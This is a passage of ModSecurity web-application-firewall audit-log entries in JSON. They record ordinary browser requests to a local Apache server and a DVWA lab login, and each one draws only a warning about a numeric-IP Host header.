\"WRc9RH8AAQEAABwOGoQAAAAB\"]"],"stopwatch":{"p1":526,"p2":919,"p3":58,"p4":139,"p5":83,"sr":21,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoUAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoUAAAAB\"]"],"stopwatch":{"p1":526,"p2":1142,"p3":48,"p4":255,"p5":62,"sr":30,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:17 --0400","transaction_id":"WRc9RX8AAQEAABwOGoYAAAAB","remote_address":"127.0.0.1","remote_port":43588,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9RX8AAQEAABwOGoYAAAAB\"]"],"stopwatch":{"p1":598,"p2":909,"p3":45,"p4":244,"p5":56,"sr":15,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:50 --0400","transaction_id":"WRc9Zn8AAQEAABwPUrUAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc9Zn8AAQEAABwPUrUAAAAC\"]"],"stopwatch":{"p1":645,"p2":902,"p3":62,"p4":323,"p5":55,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrYAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 17:07:47 GMT","ETag":"\"295-54f6adc7839e6\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc9Z38AAQEAABwPUrYAAAAC\"]"],"stopwatch":{"p1":615,"p2":1119,"p3":56,"p4":142,"p5":60,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrcAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrcAAAAC\"]"],"stopwatch":{"p1":438,"p2":1248,"p3":69,"p4":373,"p5":65,"sr":21,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:07:51 --0400","transaction_id":"WRc9Z38AAQEAABwPUrgAAAAC","remote_address":"127.0.0.1","remote_port":43590,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc9Z38AAQEAABwPUrgAAAAC\"]"],"stopwatch":{"p1":442,"p2":830,"p3":44,"p4":237,"p5":46,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCYAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBMX8AAQEAABwQSCYAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1222,"p2":5483,"p3":101,"p4":158,"p5":89,"sr":43,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:01 --0400","transaction_id":"WRdBMX8AAQEAABwQSCcAAAAD","remote_address":"192.168.75.181","remote_port":47176,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"697","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBMX8AAQEAABwQSCcAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":801,"p2":3361,"p3":101,"p4":399,"p5":65,"sr":42,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH4AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"88"},"body":["username=admin&password=password&Login=Login&user_token=0d1e1d2fde1d63d122a646a2193d0477"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"index.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/login.php\"] [unique_id \"WRdBN38AAQEAABwRiH4AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":685,"p2":4475,"p3":180,"p4":505,"p5":207,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH8AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, 